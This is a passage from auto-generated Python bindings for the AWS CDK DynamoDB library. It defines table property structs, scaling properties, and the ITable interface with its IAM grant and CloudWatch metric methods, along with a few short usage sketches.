return not (rhs == self)
def __repr__(self) -> str:
return "StreamSpecificationProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.TimeToLiveSpecificationProperty",
jsii_struct_bases=[],
name_mapping={"attribute_name": "attributeName", "enabled": "enabled"},
)
class TimeToLiveSpecificationProperty:
def __init__(
self,
*,
attribute_name: str,
enabled: typing.Union[bool, aws_cdk.core.IResolvable],
) -> None:
"""
:param attribute_name: ``CfnTable.TimeToLiveSpecificationProperty.AttributeName``.
:param enabled: ``CfnTable.TimeToLiveSpecificationProperty.Enabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-timetolivespecification.html
"""
self._values = {
"attribute_name": attribute_name,
"enabled": enabled,
}
@builtins.property
def attribute_name(self) -> str:
"""``CfnTable.TimeToLiveSpecificationProperty.AttributeName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-timetolivespecification.html#cfn-dynamodb-timetolivespecification-attributename
"""
return self._values.get("attribute_name")
@builtins.property
def enabled(self) -> typing.Union[bool, aws_cdk.core.IResolvable]:
"""``CfnTable.TimeToLiveSpecificationProperty.Enabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-timetolivespecification.html#cfn-dynamodb-timetolivespecification-enabled
"""
return self._values.get("enabled")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "TimeToLiveSpecificationProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
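# Editorial sketch (assumed usage, not generated code): wiring the property
# structs above into a CfnTable. ``scope`` is assumed to be an existing
# aws_cdk.core.Construct (e.g. a Stack); all names and values are illustrative.
def _example_cfn_table(scope: aws_cdk.core.Construct) -> "CfnTable":
    return CfnTable(
        scope,
        "ExampleTable",
        key_schema=[
            CfnTable.KeySchemaProperty(attribute_name="pk", key_type="HASH"),
        ],
        attribute_definitions=[
            CfnTable.AttributeDefinitionProperty(attribute_name="pk", attribute_type="S"),
        ],
        billing_mode="PAY_PER_REQUEST",
        stream_specification=CfnTable.StreamSpecificationProperty(
            stream_view_type="NEW_AND_OLD_IMAGES"
        ),
    )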
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTableProps",
jsii_struct_bases=[],
name_mapping={
"key_schema": "keySchema",
"attribute_definitions": "attributeDefinitions",
"billing_mode": "billingMode",
"global_secondary_indexes": "globalSecondaryIndexes",
"local_secondary_indexes": "localSecondaryIndexes",
"point_in_time_recovery_specification": "pointInTimeRecoverySpecification",
"provisioned_throughput": "provisionedThroughput",
"sse_specification": "sseSpecification",
"stream_specification": "streamSpecification",
"table_name": "tableName",
"tags": "tags",
"time_to_live_specification": "timeToLiveSpecification",
},
)
class CfnTableProps:
def __init__(
self,
*,
key_schema: typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union["CfnTable.KeySchemaProperty", aws_cdk.core.IResolvable]
],
],
attribute_definitions: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.AttributeDefinitionProperty"
]
],
]
] = None,
billing_mode: typing.Optional[str] = None,
global_secondary_indexes: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable,
"CfnTable.GlobalSecondaryIndexProperty",
]
],
]
] = None,
local_secondary_indexes: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.LocalSecondaryIndexProperty"
]
],
]
] = None,
point_in_time_recovery_specification: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
"CfnTable.PointInTimeRecoverySpecificationProperty",
]
] = None,
provisioned_throughput: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.ProvisionedThroughputProperty"
]
] = None,
sse_specification: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "CfnTable.SSESpecificationProperty"]
] = None,
stream_specification: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.StreamSpecificationProperty"
]
] = None,
table_name: typing.Optional[str] = None,
tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]] = None,
time_to_live_specification: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.TimeToLiveSpecificationProperty"
]
] = None,
) -> None:
"""Properties for defining a ``AWS::DynamoDB::Table``.
:param key_schema: ``AWS::DynamoDB::Table.KeySchema``.
:param attribute_definitions: ``AWS::DynamoDB::Table.AttributeDefinitions``.
:param billing_mode: ``AWS::DynamoDB::Table.BillingMode``.
:param global_secondary_indexes: ``AWS::DynamoDB::Table.GlobalSecondaryIndexes``.
:param local_secondary_indexes: ``AWS::DynamoDB::Table.LocalSecondaryIndexes``.
:param point_in_time_recovery_specification: ``AWS::DynamoDB::Table.PointInTimeRecoverySpecification``.
:param provisioned_throughput: ``AWS::DynamoDB::Table.ProvisionedThroughput``.
:param sse_specification: ``AWS::DynamoDB::Table.SSESpecification``.
:param stream_specification: ``AWS::DynamoDB::Table.StreamSpecification``.
:param table_name: ``AWS::DynamoDB::Table.TableName``.
:param tags: ``AWS::DynamoDB::Table.Tags``.
:param time_to_live_specification: ``AWS::DynamoDB::Table.TimeToLiveSpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html
"""
self._values = {
"key_schema": key_schema,
}
if attribute_definitions is not None:
self._values["attribute_definitions"] = attribute_definitions
if billing_mode is not None:
self._values["billing_mode"] = billing_mode
if global_secondary_indexes is not None:
self._values["global_secondary_indexes"] = global_secondary_indexes
if local_secondary_indexes is not None:
self._values["local_secondary_indexes"] = local_secondary_indexes
if point_in_time_recovery_specification is not None:
self._values[
"point_in_time_recovery_specification"
] = point_in_time_recovery_specification
if provisioned_throughput is not None:
self._values["provisioned_throughput"] = provisioned_throughput
if sse_specification is not None:
self._values["sse_specification"] = sse_specification
if stream_specification is not None:
self._values["stream_specification"] = stream_specification
if table_name is not None:
self._values["table_name"] = table_name
if tags is not None:
self._values["tags"] = tags
if time_to_live_specification is not None:
self._values["time_to_live_specification"] = time_to_live_specification
@builtins.property
def key_schema(
self,
) -> typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union["CfnTable.KeySchemaProperty", aws_cdk.core.IResolvable]
],
]:
"""``AWS::DynamoDB::Table.KeySchema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-keyschema
"""
return self._values.get("key_schema")
@builtins.property
def attribute_definitions(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.AttributeDefinitionProperty"
]
],
]
]:
"""``AWS::DynamoDB::Table.AttributeDefinitions``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-attributedef
"""
return self._values.get("attribute_definitions")
@builtins.property
def billing_mode(self) -> typing.Optional[str]:
"""``AWS::DynamoDB::Table.BillingMode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-billingmode
"""
return self._values.get("billing_mode")
@builtins.property
def global_secondary_indexes(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.GlobalSecondaryIndexProperty"
]
],
]
]:
"""``AWS::DynamoDB::Table.GlobalSecondaryIndexes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-gsi
"""
return self._values.get("global_secondary_indexes")
@builtins.property
def local_secondary_indexes(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.LocalSecondaryIndexProperty"
]
],
]
]:
"""``AWS::DynamoDB::Table.LocalSecondaryIndexes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-lsi
"""
return self._values.get("local_secondary_indexes")
@builtins.property
def point_in_time_recovery_specification(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
"CfnTable.PointInTimeRecoverySpecificationProperty",
]
]:
"""``AWS::DynamoDB::Table.PointInTimeRecoverySpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-pointintimerecoveryspecification
"""
return self._values.get("point_in_time_recovery_specification")
@builtins.property
def provisioned_throughput(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "CfnTable.ProvisionedThroughputProperty"]
]:
"""``AWS::DynamoDB::Table.ProvisionedThroughput``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-provisionedthroughput
"""
return self._values.get("provisioned_throughput")
@builtins.property
def sse_specification(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "CfnTable.SSESpecificationProperty"]
]:
"""``AWS::DynamoDB::Table.SSESpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-ssespecification
"""
return self._values.get("sse_specification")
@builtins.property
def stream_specification(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "CfnTable.StreamSpecificationProperty"]
]:
"""``AWS::DynamoDB::Table.StreamSpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-streamspecification
"""
return self._values.get("stream_specification")
@builtins.property
def table_name(self) -> typing.Optional[str]:
"""``AWS::DynamoDB::Table.TableName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-tablename
"""
return self._values.get("table_name")
@builtins.property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::DynamoDB::Table.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-tags
"""
return self._values.get("tags")
@builtins.property
def time_to_live_specification(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.TimeToLiveSpecificationProperty"
]
]:
"""``AWS::DynamoDB::Table.TimeToLiveSpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-timetolivespecification
"""
return self._values.get("time_to_live_specification")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnTableProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
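# Editorial sketch: a CfnTableProps bundle equivalent to passing the same
# keyword arguments to CfnTable directly; all values are illustrative.
def _example_cfn_table_props() -> "CfnTableProps":
    return CfnTableProps(
        key_schema=[
            CfnTable.KeySchemaProperty(attribute_name="id", key_type="HASH"),
        ],
        attribute_definitions=[
            CfnTable.AttributeDefinitionProperty(attribute_name="id", attribute_type="S"),
        ],
        table_name="example-table",  # illustrative; omit to let CloudFormation name it
        billing_mode="PAY_PER_REQUEST",
    )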
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.EnableScalingProps",
jsii_struct_bases=[],
name_mapping={"max_capacity": "maxCapacity", "min_capacity": "minCapacity"},
)
class EnableScalingProps:
def __init__(self, *, max_capacity: jsii.Number, min_capacity: jsii.Number) -> None:
"""Properties for enabling DynamoDB capacity scaling.
:param max_capacity: Maximum capacity to scale to.
:param min_capacity: Minimum capacity to scale to.
"""
self._values = {
"max_capacity": max_capacity,
"min_capacity": min_capacity,
}
@builtins.property
def max_capacity(self) -> jsii.Number:
"""Maximum capacity to scale to."""
return self._values.get("max_capacity")
@builtins.property
def min_capacity(self) -> jsii.Number:
"""Minimum capacity to scale to."""
return self._values.get("min_capacity")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "EnableScalingProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
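# Editorial sketch: the capacity bounds handed to a table's auto-scaling
# helpers; 1 and 10 are illustrative values.
def _example_enable_scaling_props() -> "EnableScalingProps":
    return EnableScalingProps(min_capacity=1, max_capacity=10)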
@jsii.interface(jsii_type="@aws-cdk/aws-dynamodb.IScalableTableAttribute")
class IScalableTableAttribute(jsii.compat.Protocol):
"""Interface for scalable attributes."""
@builtins.staticmethod
def __jsii_proxy_class__():
return _IScalableTableAttributeProxy
@jsii.member(jsii_name="scaleOnSchedule")
def scale_on_schedule(
self,
id: str,
*,
schedule: aws_cdk.aws_applicationautoscaling.Schedule,
end_time: typing.Optional[datetime.datetime] = None,
max_capacity: typing.Optional[jsii.Number] = None,
min_capacity: typing.Optional[jsii.Number] = None,
start_time: typing.Optional[datetime.datetime] = None,
) -> None:
"""Add scheduled scaling for this scaling attribute.
:param id: -
:param schedule: When to perform this action.
:param end_time: When this scheduled action expires. Default: The rule never expires.
:param max_capacity: The new maximum capacity. During the scheduled time, if the current capacity is above the maximum capacity, Application Auto Scaling scales in to the maximum capacity. At least one of maxCapacity and minCapacity must be supplied. Default: No new maximum capacity
:param min_capacity: The new minimum capacity. During the scheduled time, if the current capacity is below the minimum capacity, Application Auto Scaling scales out to the minimum capacity. At least one of maxCapacity and minCapacity must be supplied. Default: No new minimum capacity
:param start_time: When this scheduled action becomes active. Default: The rule is activated immediately
"""
...
@jsii.member(jsii_name="scaleOnUtilization")
def scale_on_utilization(
self,
*,
target_utilization_percent: jsii.Number,
disable_scale_in: typing.Optional[bool] = None,
policy_name: typing.Optional[str] = None,
scale_in_cooldown: typing.Optional[aws_cdk.core.Duration] = None,
scale_out_cooldown: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
"""Scale out or in to keep utilization at a given level.
:param target_utilization_percent: Target utilization percentage for the attribute.
:param disable_scale_in: Indicates whether scale in by the target tracking policy is disabled. If the value is true, scale in is disabled and the target tracking policy won't remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking policy can remove capacity from the scalable resource. Default: false
:param policy_name: A name for the scaling policy. Default: - Automatically generated name.
:param scale_in_cooldown: Period after a scale in activity completes before another scale in activity can start. Default: Duration.seconds(300) for the following scalable targets: ECS services, Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters, Amazon SageMaker endpoint variants, Custom resources. For all other scalable targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB global secondary indexes, Amazon Comprehend document classification endpoints, Lambda provisioned concurrency
:param scale_out_cooldown: Period after a scale out activity completes before another scale out activity can start. Default: Duration.seconds(300) for the following scalable targets: ECS services, Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters, Amazon SageMaker endpoint variants, Custom resources. For all other scalable targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB global secondary indexes, Amazon Comprehend document classification endpoints, Lambda provisioned concurrency
"""
...
class _IScalableTableAttributeProxy:
"""Interface for scalable attributes."""
__jsii_type__ = "@aws-cdk/aws-dynamodb.IScalableTableAttribute"
@jsii.member(jsii_name="scaleOnSchedule")
def scale_on_schedule(
self,
id: str,
*,
schedule: aws_cdk.aws_applicationautoscaling.Schedule,
end_time: typing.Optional[datetime.datetime] = None,
max_capacity: typing.Optional[jsii.Number] = None,
min_capacity: typing.Optional[jsii.Number] = None,
start_time: typing.Optional[datetime.datetime] = None,
) -> None:
"""Add scheduled scaling for this scaling attribute.
:param id: -
:param schedule: When to perform this action.
:param end_time: When this scheduled action expires. Default: The rule never expires.
:param max_capacity: The new maximum capacity. During the scheduled time, if the current capacity is above the maximum capacity, Application Auto Scaling scales in to the maximum capacity. At least one of maxCapacity and minCapacity must be supplied. Default: No new maximum capacity
:param min_capacity: The new minimum capacity. During the scheduled time, if the current capacity is below the minimum capacity, Application Auto Scaling scales out to the minimum capacity. At least one of maxCapacity and minCapacity must be supplied. Default: No new minimum capacity
:param start_time: When this scheduled action becomes active. Default: The rule is activated immediately
"""
actions = aws_cdk.aws_applicationautoscaling.ScalingSchedule(
schedule=schedule,
end_time=end_time,
max_capacity=max_capacity,
min_capacity=min_capacity,
start_time=start_time,
)
return jsii.invoke(self, "scaleOnSchedule", [id, actions])
@jsii.member(jsii_name="scaleOnUtilization")
def scale_on_utilization(
self,
*,
target_utilization_percent: jsii.Number,
disable_scale_in: typing.Optional[bool] = None,
policy_name: typing.Optional[str] = None,
scale_in_cooldown: typing.Optional[aws_cdk.core.Duration] = None,
scale_out_cooldown: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
"""Scale out or in to keep utilization at a given level.
:param target_utilization_percent: Target utilization percentage for the attribute.
:param disable_scale_in: Indicates whether scale in by the target tracking policy is disabled. If the value is true, scale in is disabled and the target tracking policy won't remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking policy can remove capacity from the scalable resource. Default: false
:param policy_name: A name for the scaling policy. Default: - Automatically generated name.
:param scale_in_cooldown: Period after a scale in activity completes before another scale in activity can start. Default: Duration.seconds(300) for the following scalable targets: ECS services, Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters, Amazon SageMaker endpoint variants, Custom resources. For all other scalable targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB global secondary indexes, Amazon Comprehend document classification endpoints, Lambda provisioned concurrency
:param scale_out_cooldown: Period after a scale out activity completes before another scale out activity can start. Default: Duration.seconds(300) for the following scalable targets: ECS services, Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters, Amazon SageMaker endpoint variants, Custom resources. For all other scalable targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB global secondary indexes, Amazon Comprehend document classification endpoints, Lambda provisioned concurrency
"""
props = UtilizationScalingProps(
target_utilization_percent=target_utilization_percent,
disable_scale_in=disable_scale_in,
policy_name=policy_name,
scale_in_cooldown=scale_in_cooldown,
scale_out_cooldown=scale_out_cooldown,
)
return jsii.invoke(self, "scaleOnUtilization", [props])
@jsii.interface(jsii_type="@aws-cdk/aws-dynamodb.ITable")
class ITable(aws_cdk.core.IResource, jsii.compat.Protocol):
"""An interface that represents a DynamoDB Table - either created with the CDK, or an existing one."""
@builtins.staticmethod
def __jsii_proxy_class__():
return _ITableProxy
@builtins.property
@jsii.member(jsii_name="tableArn")
def table_arn(self) -> str:
"""Arn of the dynamodb table.
attribute:
:attribute:: true
"""
...
@builtins.property
@jsii.member(jsii_name="tableName")
def table_name(self) -> str:
"""Table name of the dynamodb table.
attribute:
:attribute:: true
"""
...
@builtins.property
@jsii.member(jsii_name="encryptionKey")
def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:
"""Optional KMS encryption key associated with this table."""
...
@builtins.property
@jsii.member(jsii_name="tableStreamArn")
def table_stream_arn(self) -> typing.Optional[str]:
"""ARN of the table's stream, if there is one.
attribute:
:attribute:: true
"""
...
@jsii.member(jsii_name="grant")
def grant(
self, grantee: aws_cdk.aws_iam.IGrantable, *actions: str
) -> aws_cdk.aws_iam.Grant:
"""Adds an IAM policy statement associated with this table to an IAM principal's policy.
If ``encryptionKey`` is present, appropriate grants to the key need to be added
separately using the ``table.encryptionKey.grant*`` methods.
:param grantee: The principal (no-op if undefined).
:param actions: The set of actions to allow (i.e. "dynamodb:PutItem", "dynamodb:GetItem", ...).
"""
...
@jsii.member(jsii_name="grantFullAccess")
def grant_full_access(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits all DynamoDB operations ("dynamodb:*") to an IAM principal.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
...
@jsii.member(jsii_name="grantReadData")
def grant_read_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all data read operations from this table: BatchGetItem, GetRecords, GetShardIterator, Query, GetItem, Scan.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
...
@jsii.member(jsii_name="grantReadWriteData")
def grant_read_write_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal to all data read/write operations to this table.
BatchGetItem, GetRecords, GetShardIterator, Query, GetItem, Scan,
BatchWriteItem, PutItem, UpdateItem, DeleteItem
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
...
@jsii.member(jsii_name="grantStream")
def grant_stream(
self, grantee: aws_cdk.aws_iam.IGrantable, *actions: str
) -> aws_cdk.aws_iam.Grant:
"""Adds an IAM policy statement associated with this table's stream to an IAM principal's policy.
If ``encryptionKey`` is present, appropriate grants to the key need to be added
separately using the ``table.encryptionKey.grant*`` methods.
:param grantee: The principal (no-op if undefined).
:param actions: The set of actions to allow (i.e. "dynamodb:DescribeStream", "dynamodb:GetRecords", ...).
"""
...
@jsii.member(jsii_name="grantStreamRead")
def grant_stream_read(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all stream data read operations for this table's stream: DescribeStream, GetRecords, GetShardIterator, ListStreams.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
...
@jsii.member(jsii_name="grantTableListStreams")
def grant_table_list_streams(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM Principal to list streams attached to current dynamodb table.
:param grantee: The principal (no-op if undefined).
"""
...
@jsii.member(jsii_name="grantWriteData")
def grant_write_data(
self, grantee: aws_cdk.aws_iam.IGrantable
) -> aws_cdk.aws_iam.Grant:
"""Permits an IAM principal all data write operations to this table: BatchWriteItem, PutItem, UpdateItem, DeleteItem.
Appropriate grants will also be added to the customer-managed KMS key
if one was configured.
:param grantee: The principal to grant access to.
"""
...
@jsii.member(jsii_name="metric")
def metric(
self,
metric_name: str,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the number of Errors executing all Lambdas.
:param metric_name: -
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
@jsii.member(jsii_name="metricConditionalCheckFailedRequests")
def metric_conditional_check_failed_requests(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the conditional check failed requests.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
@jsii.member(jsii_name="metricConsumedReadCapacityUnits")
def metric_consumed_read_capacity_units(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the consumed read capacity units.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
@jsii.member(jsii_name="metricConsumedWriteCapacityUnits")
def metric_consumed_write_capacity_units(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the consumed write capacity units.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all metric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
...
@jsii.member(jsii_name="metricSuccessfulRequestLatency")
def metric_successful_request_latency(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the successful request latency.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount" | "n" - "pNN.NN" Default: Average
